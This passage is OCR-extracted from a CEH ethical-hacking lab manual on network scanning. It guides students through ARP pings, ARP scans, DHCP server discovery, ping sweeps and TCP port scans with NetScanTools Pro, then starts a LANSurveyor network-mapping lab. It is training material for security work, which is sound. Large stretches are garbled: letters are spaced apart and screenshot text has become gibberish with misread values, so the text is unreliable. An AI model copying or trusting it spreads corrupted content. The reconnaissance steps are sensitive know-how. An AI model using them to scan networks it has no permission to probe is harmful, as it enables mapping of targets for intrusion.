■ A d m in is t r a t iv e p r iv ile g e s t o r u n d ie NetScan Tools Pro to o l
L a b D u r a t io n
T im e : 1 0 M in u te s
O v e r v ie w o f N e t w o r k S c a n n in g
N e tw o r k s c a n n in g is d ie p ro c e s s o f e x a m in in g d ie activity on a network, w h ic h c a n
in c lu d e m o n i to r in g data flow a s w e ll a s m o n i to r in g d ie functioning o f n e tw o r k
d e v ic e s . N e tw o r k s c a n n in g se rv e s to p r o m o te b o d i d ie security a n d p e r f o r m a n c e
o f a n e tw o rk . N e tw o r k s c a n n in g m a y a lso b e e m p lo y e d f r o m o u ts id e a n e tw o r k in
o rd e r to id e n t ify p o te n t ia l network vulnerabilities.
N e t S c a n T o o l P r o p e r f o r m s th e f o l lo w in g t o n e t w o r k s c a n n in g :
■ Monitoring n e t w o r k d e v ic e s a v a i la b i l i ty
■ Notifies I P a d d r e s s , h o s t n a m e s , d o m a i n n a m e s , a n d p o r t s c a n n in g
L a b T a s k s
In s ta ll N e tS c a n T o o l P r o in y o u r W in d o w S e rv e r 2 0 1 2 .
F o llo w d ie w iz a rd - d r iv e n in s ta l la t io n s te p s a n d in s ta l l NetScan Tool Pro.
1. L a u n c h th e Start m e n u b y h o v e r i n g d ie m o u s e c u r s o r i n t h e lo w e r - l e f t
c o r n e r o f t h e d e s k t o p
'1J#
4 W in d o w s S e r \* f 2012
* taataiermXni faemeCvcidilcOetoceitc EMtuaian copy, luld M>:
FIGURE /.l: Windows Server 2012- Desktop view
2 . C l ic k t h e NetScan Tool Pro a p p t o o p e n t h e NetScan Tool Pro w in d o w
S 7 Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
S T A S K 1Scanning the
Network
^ Active Discovery and Diagnostic Tools that you can use to locate and test devices connected to your network. Active discovery means that we send packets to the devices in order to obtain responses..
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 143
M odule 03 - S can n in g N e tw o rk s
Administrator AStart
ServerManager
WindowsPowwShel
GoogfeChrome
HjperVkb-uoa
NetScanT... Pro Demo
h m o וי f*
Q
ControlPan*l
V
Hjrpw-V
Mdchir*.
e('nmittndI't. n.".־
w rr © *I
x-x-ac n20ז2
9
FIGURE 7.2 Windows Server 2012 - Apps
3 . I f y o u a r e u s i n g th e D e m o v e r s io n o f N e tS c a n T o o l s P r o , t h e n c lic k Start the DEMO
4. T h e Open or Create a New Result Database-NetScanTooIs Prow in d o w w ill a p p e a r s ; e n t e r a n e w d a ta b a s e n a m e i n Database Name (enter new name here)
5 . S e t a d e f a u l t d i r e c to r y r e s u l t s f o r d a ta b a s e f i le lo c a t io n , c l ic k Continue
* Open or Create a New Results Database - NetScanTools® Proו
NetScanToote Pro autom abcaly saves results n a d atabase. The database «s requred .
C reate a new Results Database, open a previous R e sd ts Database, or use this softw are r T ra n n g M ode with a temporary Results Database.
Trainrtg Mode Qutdc S״■ ta rt: Press Crea te Training Mode D atabase then press Continue.
D atabase Name (en ter new name here) A N EW Results D atabase w l be autom abcaly prefixed with ,NstProOata-' and w i end with ,.d b ? . No spaces or periods a re allowed when en terng a new database name.
Results Database File Location
Test|
Results D atabase D irectory
C : jJsers\Administrator docum ents
Se lect Another Results Database
C*״ reate Trainmg M ode Database
Se t Default D irectoryProject Name (opbonal)
Analyst Information (opbonal, can be cisplayed r\ reports if desired)
Name Telephone Number
Title Mobile Number
Organization Email Address
Exit Program
Update Analyst In forma bon
ContinueUse Last Results Database
FIGURE 7.3: setting a new database name for XetScan Tools Pro
6 . T h e NetScan Tools Pro m a in w in d o w w ill a p p e a r s a s s h o w i n d ie
f o l lo w in g f ig u re
£L) Database Name be created in the Results Database Directory and it will have NstProData- prefixed and it will have the file extension .db3
i—' USB Version: start the software by locating nstpro.exe on your USB drive ־ it is normally in the /nstpro directory p
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 144
M odule 03 - S can n in g N e tw o rk s
test • NetScartTools* Pro Demo Version Build 8-17-12 based on version 11.19
file Eflit A«es51b!11ty View IP«6 Help
Wefccrwto NrtScanTooh#f 5 [W o Vbtfen 11 TH1 fattwaiv n a drro ro< k>* •re* t00“i Cut todi hav• nir or luiti Th■ duro M i a be ccn«e>ted to j W vtfden
H m x x d '•on ■hr A Jo i^ e d cr Vtao.a tads cr 1»כ|» groined by fuidian on the kft panel
R03 iso- root carract :־« ta״oet. orwn icon :coa I8!en to net«11k traff c.ttu ; icon tooo ו•®* wf yoj oca sy*em. end groy !con loots contact •hid p51t> w * a w
Fleet ' i t FI '«&, to vie״ C <? a te rg h * local help !ncLdng Gerttirg Suited tfam&xiAutomated too is
M3nu3l loci: 13III
fw orne tools
*LCrre Dtt<ov<r/tools
Pass ׳ve 0 scow 1y ro ois י
o t« ז 0015 P 3 « tt 1*vn toon
tx tm u l >00 is
pro own into
FIGURE 7.4: Main window of NetScan Tools Pro
7 . S e le c t Manual Tools (all) o n th e l e f t p a n e l a n d c l ic k ARP Ping. A
w in d o w w ill a p p e a r s f e w i n f o r m a t i o n a b o u t d i e A R P P in g T o o l .
8. C lic k OK•°־היד - ז
Klrt'iianTooltS Pio ' J
test NetScanToois® Pro Demo Version Build 8 17 12 based on version 11.19File fd it AccettibHity View I M MHp
About the ARP Ping Tool• use rhK tool to חקי*. ' an IPv4 address on your subnet usino ARP packers. »s< it on your
LAN to find the 1a*>:׳'*£ tkne o ' a device to an ARP_REQl)EST jacket evai if 3ie d&r ce s hidden and does not respc *d to ־׳egu a Png.
• ARP Pina require*,ג target IPv4 address on your LAN.• D on 't miss th is special fea tu re in th is tool: Identify duplicate IPv4 address by ‘singing‘ a ssecfic
IPv4 address. I f more th a- Gne Cevice (tw o or rrore MAC addresses} responds, you areshown them a c a dd iea o f each of the deuces.
• D on 't fo rg e t to r!ght d k * in the results for a menu with more options.
D em o I im ita tions.• None.
Automata!! ToolManual Tool( Ml
imARP Scan (MAC Ua
i jCa«h« Fm n itd
♦Co*n«t»o« Monit.
c Tooll
A111 vc Dhiuveiy To׳
Piss ״re Otttovety T«
o n s roots
p3c« t Level root
brcemai toots
Pro 0r3m Into
| (<x Help pres* FI
FIGURE 7.5: Selecting manual tools option
S e le c t th e Send Broadcast ARP, then Unicast ARP r a d io b u t t o n , e n t e r
th e I P a d d r e s s i n Target IPv4 Address, a n d c l ic k Send Arp9 .
— IP version 6 addresses have a different format from IPv4 addresses and they can be much longer or far shorter. IPv6 addresses always contain 2 or more colon characters and never contain periods. Example: 2 0 0 1 :4 8 6 0 :b 0 0 6 :69 ( i p v 6 .g o o g l e .com) o r ::1 ( i n t e r n a l l o o p b a c k a d d r e s s
£ 7 Arp Ping is a useful tool capable of sending ARP packets to a target IP address and it can also search for multiple devices sharing the same IP address on your LAN
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 145
M odule 03 - S can n in g N e tw o rk s
s i- test NetScanTools® Pro Demo Version Build 8 17 12 based on version 11.19,״!File Fdit Accessibility View IPv6 Help
A n ® To Automated |
Report?Q Add to Psvorftoc
Send B־ooCC35t ARP, then U itost ARPDupi:a;-5 S-־c מ
(f: 0 0.0 0 Ol FAd*
EO send B-oaCcae: a r p cnly
O Se*th for Dipica te IP Addesoss
U9e ARP Padtets to Pnc an [Pv« adjf c55 on y a rsubnet.
Target IPv4 Aad ettI ndex i p Aaaress mac Address Response Tine (aaeci Type0 10.0.0.1 - •• •* ♦ - cc 0.002649 Broadcast1 < * 10.0.0.1 ־ ♦ cc :.o ::» to Unicast2 10.0.0.1 - - ■+ ce 0.003318 tin Icaat3 10.0.0.1 cc 0.002318 Onieaae4 10.0.0.1 • cc 0.0:69*3 ur. icaa t5 10.0.0.1 - •• — ♦ cc 0.007615 Cr. leastf 10.0.0.1 cc 0.002518 Cr. Icaatל 10.0.0.1 - *• •* <» c r 0.M198C Tin icaat8 • • » • ־ • ♦ ־ ' 10.0.0.1 cc 0.0:165$ Onieaae3 • • • ♦ ♦ 10.0.0.1 - ־ cc 0.0:231.8 Ur. icaa t10 10.0.0.1 cc 0.002649 Unicast11 10.0.0.1 - *• <•> cc 0.0:2649 Unicast12 10.0.0.1 - cc 0.002318 Unicast13 10.0.0.1 ״♦»«•••••• cc 0.002318 Unicast14 10.0.0.1 • cc O.OS2649 Vnicaat15 10.0.0.1 Unicast
iendArcStop
N jrb n to Send
Cyde Tne (ms)
I“00 EJWnPcap Interface P
Autowted Tools ►.lanual Tools lalf)
UARP Ping
y■ an |MA£
uAflP^can |MAC S<»n)
Cache Forensic{
Connwtwn Monitor |v |
Fawortte Tooli
Aa!re DHtovery Tool!
Pj11!x< Oiiovcry Tooli
O t« Tools
P a « « level rools tr tem ji looit
f*־coram Into
FPuiger 7.6: Result of ARP Ping
10. C lic k ARP Scan (MAC Scan) i n t h e l e f t p a n e l . A w in d o w w ill a p p e a r
w i t h i n f o r m a t i o n a b o u t t h e A R P s c a n to o l . C l i c k OK
Q Send Broadcast ARP, and then Unicast ARP - this mode first sends an ARP packet to the IPv4 address using the broadcast ARP MAC address. Once it receives a response, it sends subsequent packets to the responding MAC address. The source IP address is your interface IP as defined in the Local IP selection box
y J ׳׳al Tool! • ARP Pi!
p־•oad castic o s tleasele a s tl e a s eic a s tl e a s tle a s tl e a s t
i c a a t
!e a s t!east
le a s t
icaat
test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
File Fdit Accessibility View IPv6 Help
About the ARP Scan Tool• Use U ib to o l lo send an ARP RoqiM&t to evury IP v 4 address on your LAN. IPv4 connected
d«vuet csnnothnto f tv r־ ARP 3acfc«C» and mu»t rupond with th • ! IP and MAC a d f ir • * • .• Uncheck w e ResoKr? f>5 box for fssrti scan co׳rp i« o n ome.• Don't Cornet to 1io : d ck n the 1e>ul:s for a menu with moio options.
mo Lim itations. Hone.
Automated Tool
y
ARPStan 1 mac sea
Ca<n« ForcnsKs
Attn* Uncovefy 10׳relive l>K0v»ry l«
H 3«rt level Tool
ש ARP Scan (sometimes called a MAC Scan) sends ARP packets to the range of IPv4 addresses specified by the Start and End IP Address entry boxes. The purpose of this tool is to rapidly sweep your subnet for IPv4 connected devices.
FIGURE 7.7: Selecting ARP Scan (MAC Scan) option
11. E n t e r th e r a n g e o f I P v 4 a d d r e s s i n Starting IPv4 Address a n d Ending IPv4 Address t e x t b o x e s
12. C lic k Do Arp Scan
Ethical Hacking and Countermeasures Copyright O by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 146
M odule 03 - S can n in g N e tw o rk s
ar The Connection־Detection tool listens for incoming connections on TCP or UDP ports. It can also listen for ICMP packets. The sources of the incoming connections are shown in the results list and are logged to a SQLite database.
13 . C lic k DHCP Server Discovery i n th e l e f t p a n e l , a w in d o w w ill a p p e a r
w i t h i n f o r m a t i o n a b o u t D H C P S e r v e r D i s c o v e r y T o o l . C lic k OKf*: test - NetScanTods® Pro Demo Version Build 8-17-12 based on version 11.19 ! ־ n ' *
f4 e Ed* Accessibility View IPv6 Help
LJ DHCP is a method of dynamically assigning IP addresses and other network parameter information to network clients from DHCP serv.
FIGURE 7.9: Selecting DHCP Server Discovery Tool Option
14. S e le c t a ll th e Discover Options c h e c k b o x a n d c l ic k Discover DHCP Servers
RPScan IMAC Son,
cry Type localnax le 10.0 .0naxic 10.0.0
Alum! Hit* DHCP Sorv1*f Discovery Tool
• Use Uib 1004 to jitnn iy locate DHCP *ervur* < IP v l only) on your local network. It iho m th«P addr«u and o r« MC'qt ar« b«ng handed out by DHCP wwao. Ih it too! an aw find unknown or rooue' DHO3 swverj.
• Don't I ot get to right dck n th* results for a menu with more options.
Dano limitations.• None.
Automated loolManual 10011 !all
Cathe Forensic!
♦Connection Monitc
O KPSfw r Oucorc
a-Tools «
JDNS Tools-core
Pnunr DutoveiyTc
P « l r l level Tool External Too 11
test NetScanTools* Pro Demo Version Build 8-17 12based0nvefs»00 11.19־היו“ ־־ יFile Edil Accessibility View IPv6 Help
Manual Too 4 - ARP Scan (MAC Scan) $
adjKocc [ J j p׳ 0 ־ A 1 2 ra a l
I ]AddtsavaKat
Staraic F v4 Accrea־
| :0 . 0&v4ng IPv4 A<*jrc55
E n try Type l>5c•!
d y n a m o 10.0.0dynazdc 1 0 .0 .0
ip v l M . . . W1C Adtireflfl I / r M 4 nur*cf3 rer B c a ta ■ *
1 0 .0 .0 .1 ׳ )0 n e t ; c a r , l a c . 110.0.0.2 EC . &»11 lac vm-MSSCL.
פב
U9e thE tool a fine al active IPv4 d r ie rs oי׳ youi n im -t.
wrtpeap Interfax ipI 10.0.0.7
Scon OSsy Tnc {•>»)
(IZZ₪0 Resolve P s
intonated Toots kUnuai Tools laif)
ARP Ping
can (MAC
uASP Scan (MAC Scan)
Cache forennct
Connection Monitor
Favorite Tools Active OhcC׳vify Tool! Pasiive Ofitovtry Too 11
o m Tools P3<Mt LPV81 Tools
exttmai toon r^ooram Into
FIGURE 7.8 Result of ARP Scan (MAC Scan)
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 147
M odule 03 - S can n in g N e tw o rk s
Q NetScanner, this is a Ping Scan or Sweep tool. It can optionally attempt to use NetBIOS to gather MAC addresses and Remote Machine Name Tables from Windows targets, translate the responding IP addresses to hostnames, query the target for a subnet mask using ICMP, and use ARP packets to resolve IP address/MAC address associations
FIGURE 7.10: Result of DHCP Server Discovery
15 . C lic k Ping scanner in t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i th
i n f o r m a t i o n a b o u t P in g S c a n n e r to o l . C lic k OK
£0 Port Scanner is a tool designed to determine which ports on a target computer are active Le. being used by services or daemons.
16. S e le c t t h e Use Default System DNS r a d io b u t t o n , a n d e n t e r t h e r a n g e
o f I P a d d r e s s in Start IP a n d End IP b o x e s
17 . C lic k Start
N«tSunT00i13 P10 S?
test NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19
About the Ping Scanner (aka NetScanner) lool• use rim rooJ ro pmo .י ranoe or lm of IPv4 addresses. rtv stool shows you cb rompute׳s
are active w tJiir! tr*rano^ii5t(tJ1* hav« to rapond to omo). Uso it *vith *1* u to f Fadflf«s«s. To teeafl ee*׳ces n your subnrt mdudmg trios*blocking ping, you can >10 um ARP Sontool.
• You can ■nport a text lest of IPv4 addresses to pngDon't mres this speaal feature m this took use the Do SMB/NBNS scan כס qg: n«B»S resoonscs fiom unprotected W!ndo*s computers.
• Don't forget td nght didc m the results for a menu with more opaons.
Demo Imitations.• Packet Delay (time between sending each ping) is limited to a lower tamt of SO
iMlBeconds. packet Delay can be as low as zero (0) ms מ the f ill version. In other words, the full version w i be a bit faster.
F8e EdK AtcesiibiRty Vltw IPv6 H«tp
A j.jAICWtKOIM
AUtOIMt«J To Oh MjngjJ T00K (411:
mPng ErV1«K«J
mfir, g - Graphi cal
aPort Scanner
. JP ’oam uoin Mod* *><«
ravontf 001 ז:
Mint Ducoycnr to ׳Paijivt Discovery 10
DNS roouP a a e t i m l tool}
t<tcma! Tools
°rooram inro
FIGURE 7.11: selecting Ping scanner Option
T ~ T n 1 « '
Iy test - NetScanTools* Pro Demo Version Build 8 -17-12 based o r version 11.19
Fnri DHCP Servers an fa r Add ItoieFor Hdo. p׳-e£8 F: IMA ס׳יד״־ג A.־omv־rd
־ ־ ] * ״ * ] *״'° ־Ode or mtrrfacc bdow then crcos Discover QAddtoP®»«nre5
T M A ddress KIC A ddreas I n t « r f « r • D e s c r ip t io n
10.0.0.7 L . Jfc j%־ »v 411 iD Hyper-V V irta • ! Ethernet Adapter #2
Rssordnc DHCP servers
Discover ( X P Server*
Stop
Wat Time (sec)
EHCr Server IP Server Hd3LnoM Offered I? Offered Subnet Mask IP Address Iי 10.0.0.2 10.0.0.1 10.0.0.1 SS.2SS.2SS.0 3 days, 0:0(
DiscouB־ Opttans
׳י H05tn3r1eV Subnet M5*rV׳ Donor ftairc׳י d n s p
׳י Router P
fa*KTP Servers
Aurc mated To 015
Cache F orenwes
B.:nncct on Monitor
DHCP S«1 1 » ׳ Dfccovtry
aTook - !
aDfIS Took - Cote
OWSTools ■Advanced
F־worit« Tools A<tfc« Dii coveiy Tools Paislv* Discovery Tools
DNS Tooll =*>«» t r r t l TooH
W * rnjl Tools P10gr«n into
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 148
M odule 03 - S can n in g N e tw o rk s
test - NetScanTools * Pro Demo Version Build 8-17-12 based o r version 11.19---«e 6dK Accessibility View IPv6
Start iP 10.0.0.: ׳י חח Lke Defadt Systen DN5j '•׳|
End JP 10.0.0.S0 - 1*1O Use Specific DNS: 1307.53.8.8 v l l *
AKANrtSeannw □ Add»Po»<nre5
Time (m | Statao0:0 t e a : s c p iv 0:0 tchs toply 0:0 Echs tap ly 0:0 Echs Reply
T a rg e t IP Hostname
10.0.0.1 ? 010.5.0.2 tnK-KSSELOUKU 010.0.0.5 my:-UQM3MRiR«M 01 0 .0 .0 .7 WIN-D39HRSHL9E4 0
Fa Hdp, press F1
0 Resolve TPs
MSttp.0/.25SWl Addtbnal Scan Tests:
1 103 I oca ARP Scat
□D 3S*׳E.fc8\S5car
□ Do Sulnel Mai: Sea־!
EnaSfc Post-ScanM O b lg of
rton-Resso'dn; P s
| irw: »vu«:I Oeof IwpQUr t tn»
Aurc mated To 015
©
J ?Port Scanner
mPro»ucuou5 Mode S<onr
F־r»01 »* Tools Art hit Oil cover? Tools Pais** Discovery Tools
DNS Too 11 S*׳J «I Lcrtl Tool I
M e m * Tools Pfogr•!* info
£Q Traceroute is a tool that shows the route your network packets are taking between your computer and a target host. You can determine the upstream internet provider(s) that service a network connected device.
FIGURE 7.12: Result of sail IP address
18. C lic k Port scanner i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i th
i n f o r m a t i o n a b o u t d i e p o r t s c a n n e r to o l . C lic k OK- _ l n l x ך
unnei/NetSiannei 9
\
test NetScanTod‘ $ Pro Demo Version Build 8-17-12 based on version 11.19F
About the Poit Scanner I oolNEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER’S PERMISSION TO SCAN.
• use rtm ז ool to scan j taro** for ICP or יוגווו ports that .מור iKrrnang (open wirh senna* fcstenino).
• lypes of scanning supported ruli Connect TCP Scan (see notes below}. U0P port u'reachasle scan, combined tu> ful connect and uop scan, TCP SYN only scan and tcp orrer son.
• Don't miss this special feature in this tool: After a target has bee scanned, an a״alfss .vineow will open in >our Oeh J t web browser.
• Don't forgetמז nght c*<k n we resjits for 3 menu with more options.
Notes: settings that strongly affect scan speed:• Come:San Timeout. use 200 c* less on a fact network correction yjdhneaiby cor״p.te i. - « 3 seconds) or ־ 3003 (
more on a dau: cameao־׳.• Wot After Connect - J i s c-110•• o5 each port test worts before deodng that ih ־׳ ; port is not 5c»»e.• settirxcAXbv settee* ccmccxns. Try 0, (hen (ry lire. Notice the dfference.• SetOnqs ax °«<M ConnectorsDo mo KmlUtlons.• Hone.
F ie Edit Acceuibilrty View IPv6 Helpri 1 h 3■ ב> I Welcome
utwateO Tooli׳,•
M«nu«ITouu lair
noo tnrunced
P nq Scanner
Port Scanner
UP = f»»cu0\j1 Mode ‘
FIGURE 7.13: selecting Port scanner option
19. E n t e r t h e I P A d d r e s s i n t h e Target Hostname or IP Address f ie ld a n d
s e le c t t h e TCP Ports only r a d i o b u t t o n
2 0 . C lic k Scan Range of Ports
Whois is a client utility that acts as an interface to a remote whois server database. This database may contain domain, IP address or AS Number registries that you can access given the correct query
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 149
M odule 03 - S can n in g N e tw o rk s
1-1°test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19־ ״ ׳fte Ed* Accessibility View 6י\(ו Help
Manual Fools - Port Scanner ^
I • ■ 'T C P P o r t s IPore Range are! Sarvfcafc
LDP P3te Cny AnpTO AutOHHted |
O TCP 4UJP Ports ( IO tcpsynOlCPaMM □^to^ont•
Start 1
B'd fa
T3r0ut HKTSire 3r P A:d־£S3
I 10.0-0 1 IWARNING: the- tod scan? r * rargrfr- ports.
Scan C irp lrtr.
Show Al S anr«d Ports, Actlvi 0! Not
P o r t P o r t Dvac P ro to c o l R r» u lt» O at• ft• » .v » d
80 h te p TCP P o r t A c tiv e
R.anoc of ! v s ״Sea
St * י Comnon Path
| E d tcon w ■ Part{ Let
MrPasp :-ir-^acr ־:10.D.0.Comect T rcout ( 100D = !second]
:watAfte'Conncc (ICOO -1 s*aofl
:
FIGURE 7.14: Result of Port scanner
Automated Tool?
Manual Toots (alij
m
Poit Scanner
JPro«ucuom Mode ‘
f3vor1t* Tools A<t*׳« Dtscorery Tools Passr* Discovery tools
DNS roois p«*«ttml loon txtemji tools program inro
L a b A n a ly s is
D o c u m e n t a ll d ie I P a d d re s s e s , o p e n a n d c lo s e d p o r t s , se rv ic e s , a n d p r o to c o ls y o u
d is c o v e re d d u r in g d ie lab .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
A R P S c a n R e s u l t s :
■ I P v 4 A d d r e s s
■ M A C A d d r e s s
■ I / F M a n u f a c tu r e r
■ H o s t n a m e
■ E n t r y T y p e
■ L o c a l A d d r e s sN e t S c a n T o o l s
p r o I n f o r m a t i o n f o r D i s c o v e r e d D H C P S e r v e r s :
■ I P v 4 A d d r e s s : 1 0 .0 .0 .7
■ I n t e r f a c e D e s c r i p t i o n : H y p e r - V V i r tu a l
E t h e r n e t A d a p t e r # 2
■ D H C P S e r v e r I P : 1 0 .0 .0 .1
■ S e r v e r H o s t n a m e : 1 0 .0 .0 .1
■ O f f e r e d I P : 1 0 .0 .0 .7
■ O f f e r e d S u b n e t M a s k : 2 5 5 .2 5 5 .2 5 5 .0
Ethical Hacking and Countermeasures Copyright O by EC-CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 150
M odule 03 - S can n in g N e tw o rk s
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TOTHIS LAB.
Q u e s t io n s
1. D o e s N e tS c a i i T o o ls P r o s u p p o r t p r o x y se rv e rs o r f irew a lls?
I n t e r n e t C o n n e c t i o n R e q u i r e d
0 N oes□ Y
Platform Supported
0 iLabs0 Classroom
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 151
M odule 03 - S can n in g N e tw o rk s
Drawing Network Diagrams Using LANSurveyorl 42\s/nvejor discovers a nehvork andproduces a comprehensive nehvork diagram that integrates OSI Layer 2 and Lajer 3 topology data.L a b S c e n a r io
A il a tta c k e r c a n g a th e r in f o r m a t io n f r o m A R P S c a n , D H C P S e rv e r s , e tc . u s in g
N e tS c a n T o o ls P r o , a s y o u h a v e le a r n e d i n d ie p r e v io u s la b . U s in g d iis in f o r m a t io n
a n a t ta c k e r c a n c o m p r o m is e a D H C P s e rv e r 0 1 1 t h e n e tw o rk ; th e y m ig h t d is r u p t
n e tw o r k s e rv ic e s , p r e v e n t in g D H C P c lie n ts f r o m c o n n e c t in g t o n e tw o r k re s o u rc e s .
B y g a in in g c o n t r o l o f a D H C P s e rv e r , a t ta c k e rs c a n c o n f ig u re D H C P c lie n ts w i th
f r a u d u le n t T C P / I P c o n f ig u ra t io n in f o r m a t io n , in c lu d in g a n in v a l id d e fa u l t g a te w a y
o r D N S s e rv e r c o n f ig u ra t io n .
111 d i is la b , y o u w ill le a r n t o d r a w n e tw o r k d ia g ra m s u s in g L A N S u rv e y o r . T o b e a n
e x p e r t network administrator a n d penetration tester y o u n e e d to d is c o v e r
n e tw o r k to p o lo g y a n d p r o d u c e c o m p r e h e n s iv e n e tw o r k d ia g ra m s f o r d is c o v e re d
n e tw o rk s .
L a b O b je c t iv e s
T h e o b je c t iv e o f d iis la b is to h e lp s tu d e n ts d is c o v e r a n d d ia g r a m n e tw o r k to p o lo g y
a n d m a p a d is c o v e re d n e tw o r k
1 1 1 d i is la b , y o u n e e d to :
■ D ra w ’ a m a p s h o w in g d ie lo g ic a l c o n n e c t iv i ty o f y o u r n e tw o r k a n d n a v ig a te
a r o u n d d ie m a p
■ C re a te a r e p o r t d ia t in c lu d e s all y o u r m a n a g e d sw itc h e s a n d h u b s
ICON KEY27 Valuable
information
Test yourknowledge
ס Web exercise
m Workbook review
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 152
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
T o p e r f o r m d ie la b , y o u n e e d :
■ L A N S u r v e y o r lo c a te d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor
■ Y o u c a n a ls o d o w n lo a d th e l a t e s t v e r s io n o f LANSurveyor f r o m d ie l in k
h t t p : / / w w w .s o la r w i 1 1 d s . c o m /
■ I f y o u d e c id e to d o w n lo a d d ie la te s t v e r s io n , d ie n s c r e e n s h o ts s h o w n i n d ie
la b m ig h t d if fe r
■ A c o m p u t e r r u n n in g Windows Server 2012
■ A w e b b r o w s e r w id i I n t e r n e t a c c e s s
■ A d m in is t r a t iv e p riv ile g e s to m i l d ie LANSurveyor to o l
L a b D u r a t io n
T im e : 1 0 M in u te s
O v e r v ie w o f L A N S u r v e y o r
S o la rW in d s L A N s u r v e y o r a u to m a tic a lly d is c o v e rs y o u r n e tw o r k a n d p r o d u c e s a
c o m p r e h e n s iv e network diagram th a t c a n b e easily e x p o r te d to M ic r o s o f t O f f ic e
V is io . L A N s u r v e y o r a u to m a tic a lly d e te c ts new devices a n d c h a n g e s to network topology. I t s im p lif ie s in v e n to r y m a n a g e m e n t fo r h a rd w a re a n d s o f tw a re a s se ts ,
a d d re s s e s r e p o r t in g n e e d s f o r P C I c o m p l ia n c e a n d o t h e r re g u la to ry re q u ire m e n ts .
L a b T a s k sIn s ta l l L A N S u rv e y o r o n y o u r Windows Server 2012
F o l lo w d ie w iz a rd - d r iv e n in s ta l la t io n s te p s a n d in s ta l l L A N S u rv y o r .
1. L a u n c h th e Start m e n u b y h o v e r i n g d ie m o u s e c u r s o r in t h e lo w e r - le f t
c o r n e r o f t h e d e s k t o p
ZZy Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
TASK 1Draw Network
Diagram
4 Windows Server 2012
* I S M fcnar X ltl (Wmw CjnMditt(*akrtun lopy. lull) •40:
FIGURE 8.1: Windows Server 2012 - Desktop view
2 . C lic k th e LANSurvyor a p p t o o p e n th e LANSurvyor w in d o w
CEH Lab Manual Page 153 Ethical Hacking and Countermeasures Copyright © by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
Start A d m in istra to r £
S e rw Windows Goo* H»p«V IANmny...M ora le r PowetShd Chrwne 1•■,XU j .
b m o 91 ■
Panal
Q w
e w : a
rwn«t hptom ״ ף l i
MegaPing NMScanL.Pto Demo
* s
FIGURE 8.2 Windows Server 2012 - Apps
3 . R e v ie w th e l im i ta t io n s o f t h e e v a lu a t io n s o f tw a r e a n d t h e n c l ic k
Continue with Evaluation t o c o n t i n u e th e e v a lu a t io n
SolarWן - י םי * יי inds LANsurveyor
TFile Edit Men aye Monitor Report Tods Window Help
s o l a r w i n d s
FIGURE 8.3: LANSurveyor evaluation window
4 . T h e Getting Started with LANsurveyor d ia lo g b o x is d is p la y e d . C lic k Start Scanning Network
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
LANsurveyor's Responder client Manage remote Window’s, Linus, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files
^ LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)
CEH Lab Manual Page 154
M odule 03 - S can n in g N e tw o rk s
r Getting Started with LANsurveyor ■ a u
solarw inds7'
V/atch a vdae nt'oto barn more
What you can do with LANsurveyor.
Scan and map Layer 1. 2. 3 network topology
& ] Export maps to Microsoft Vtito » View example mgp
"2 Continuously scan your network automatically
Onca aavod, a I cuatom ׳nap■ a car be uotd m SelarV/nda not/.o׳k and opplcotor
management software, learn more »
» thwack LANsurveyor forumthwack is 8 community site orovidiro SobrtVrds jse s with useful niomaton. toos and vauable reso jrces־
» Qnfcne ManualFor additional hep on using the LAIJsu־veyor read the LANSurveyor Administrator Gude
» Evaluation GuideTha LAMaurvayor Evaiuabon Guida prcvdaa an irtr»d1»cton to LAMaurvayor faaturaa ard ratnicbcna fer nataltng. confgurnj, and jsmg LAHsurveyor.
» SupportTheSohrwinds Supoorl W et»i» offer* a senprehersve set of tool* tc help you nanaoea^d nartaai yo»r SohrWind* appleations v b t tne <]1a w js a i£ .g a 2s , r ic q y y r ty Q vy»t9»». o r Jp o a ic
] [Start Scanrir.g Net a 0*1:I I Don't show agah
FIGURE 8.4: Getting Started with LANSurveyor Wizard
5. T h e Create A Network Map w i n d o w w ill a p p e a r s ; i n o r d e r t o d r a w a n e t w o r k d ia g r a m e n t e r t h e I P a d d r e s s i n Begin Address a n d End Address, a n d c l ic k Start Network Discovery
f i LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.
